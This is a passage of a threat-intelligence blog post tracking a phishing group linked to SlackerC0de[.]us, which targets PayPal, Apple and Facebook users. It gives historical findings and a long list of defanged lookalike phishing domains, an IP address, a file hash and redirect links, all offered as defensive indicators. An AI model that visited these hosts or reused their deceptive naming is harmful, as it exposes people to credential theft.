<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="619" src="https://lh3.googleusercontent.com/gaQBm15PUTeWHlRKa2U3Knh1Sx70YjuadGGT0j2erSjFvWZ4LQaaCoXKXmLiRLYedewakxOulzjcXA2VHZFxw_FWFODlb6ZQQu6X-WDpl3srdQFuALZy2dmQdGpGhX3HiCw7ZI8K" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="465" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing a screen capture of his Phishing email.</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="425" src="https://lh5.googleusercontent.com/4p7-K4qMpnBoz1SkQHZNJJg3FM2AP5MjKeOJLhX3dd9TJ754vmrwjWJ96XJBtUQxCYCQKj5Rm2zchDxEnku4CDH3WZ5k7W5SZDpQxjZi4vmF-xQhB2JLK1CWqsbmRF-i22q88N2n" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing a screenshot in hopes of troubleshooting an error.</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="351" src="https://lh6.googleusercontent.com/R2dh9xE0KKHXzH31U6KTltnai0j7TqINt8iIWWppb7N6AvlS8cMxFr-IKZXRI7fBNTwT0pZuLvla-XV-313qV9fh1uyU3cw_bDue7vV_pVbURIpV8IsSft7QyOmviARMorodRDDK" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing a screenshot of his blocked Amazon account.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;"><span style="font-weight: 700; text-decoration-line: underline; white-space: pre-wrap;">Historical Observations</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">We then tried to look for historical correlation and past activity this group may have been connected to, so we started looking through <a href="https://www.recordedfuture.com/" target="_blank">RecordedFuture</a>’s threat intelligence platform for further relationships and activity. </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When we initially looked at the main domain - we were looking for what malware <a href="https://www.recordedfuture.com/" target="_blank">RecordedFuture</a> may have seen connected to SlackerC0de<span style="white-space: normal;">[.]</span>us, if any at all. In this case we were able to see that some ransomware activity and various intertwined domains were connected to SlackerC0de<span style="white-space: normal;">[.]</span>us.</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="293" src="https://lh4.googleusercontent.com/9kvZelh-iKCuQh0fMPLPP8lUSm3RIegtD-KERXReCBX9PLtJyBDfDb022oEjt9_3yfzjskx9oyCsygGz1GJM3tyAKWL799nTIJAU0zsEZfTTa9eg37XCeu0erM7AEM5kJJyPna67" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: RecordedFuture</span></td></tr>
</tbody></table>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">So we continued to look for connected phishing campaigns, and saw that prior to the July 2018 PayPal and Apple campaign that started our investigation, the group ran earlier campaigns in January - mainly targeting Apple and Facebook users. </span><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="325" src="https://lh6.googleusercontent.com/jjro4XAM4kePn7oR1u2i-gDQBwiecRSdD0T5yV-hhywTyEzgUnNuHlj2L23d7jN750cejsAn3QR1T3BTcgDQGcmH6USzc8phxtcb6OsHuE0CjCjjJfyjuRTVIz5_FAl3cH89X5tX" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: RecordedFuture</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Meaning this group is probably constantly busy all year round targeting all the varied popular services in efforts of scamming people out of their money and credentials.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">IOCs</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-3c560057-b417-2c4d-1e55-095a46fa8d92" style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t<span style="white-space: normal;">[.]</span>co-d3gbfd<span style="white-space: normal;">[.]</span>city</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-appredno<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">source-notice<span style="white-space: normal;">[.]</span>ldweblogin.appleid.ldapple.idwebtrue-loginid<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.pyapal<span style="white-space: normal;">[.]</span>com-websecurity<span style="white-space: normal;">[.]</span>app</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">r2.direckkuy1<span style="white-space: normal;">[.]</span>net</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">r1.direckkuy1<span style="white-space: normal;">[.]</span>co</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-serviceart<span style="white-space: normal;">[.]</span>tech</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-serviceart<span style="white-space: normal;">[.]</span>co</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-appredasu<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa<span style="white-space: normal;">[.]</span>com-accountverify<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-unauthorized-activity<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.pyapal<span style="white-space: normal;">[.]</span>com-unauthorized-activity<span style="white-space: normal;">[.]</span>report</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-resolution-centers<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-accsuired<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">a.redirkues<span style="white-space: normal;">[.]</span>com</span></span><br />
<span style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">www.paypa.com-verifyinc<span style="white-space: normal;">[.]</span>net</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-webbapps<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa.com-accountverify<span style="white-space: normal;">[.]</span>net</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webappseeds<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webapps-security<span style="white-space: normal;">[.]</span>tools</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">mail.directseeds<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.co.uk-service<span style="white-space: normal;">[.]</span>solutions</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.co.uk-service<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">direku.2.co-d3gbfd<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">direku.1.co-d3gbfd<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.co.uk-service<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-verifyseeds<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-accountverify<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa.com-verifyseeds<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-verifyaccount<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-signinaccountsafe<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa.com.lakukerascok<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webappsloginaccount<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webappsloginaccount<span style="white-space: normal;">[.]</span>systems</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t.co-d3gbfd<span style="white-space: normal;">[.]</span>cc</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">142-4-14-169.unifiedlayer<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">jancokkoen<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">shirtmy<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Lakukerascok<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">com-signinaccountsafe<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">nugra-saputra<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Paypal-customer-confirm<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-webapps<span style="white-space: normal;">[.]</span>site</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-webappsinfo<span style="white-space: normal;">[.]</span>reviews</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypa.com.lakukerascok<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com.accountinfoverifysupport<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-accountverify<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.accountinfoverify<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypa.com-verifyseeds<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-verifyaccount<span style="white-space: normal;">[.]</span>center/ </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-accountservice<span style="white-space: normal;">[.]</span>info</span></span><br />
<span style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">pavpal[.]com-appverifyaccount[.]me</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">142.4.14<span style="white-space: normal;">[.]</span>169</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">3ef2bd65e746676d25e7d6e017b03cdb7b906e6de5559cffae43f03142617395</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Redirects</span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t.co-d3gbfd<span style="white-space: normal;">[.]</span>city</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/tettew</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/shrt</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/_Ebfo0oe</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">xt<span style="white-space: normal;">[.]</span>lv/XJiEa</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">alif.idseedapp<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/webappss</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">kuntulmaju<span style="white-space: normal;">[.]</span>ml/cuk </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
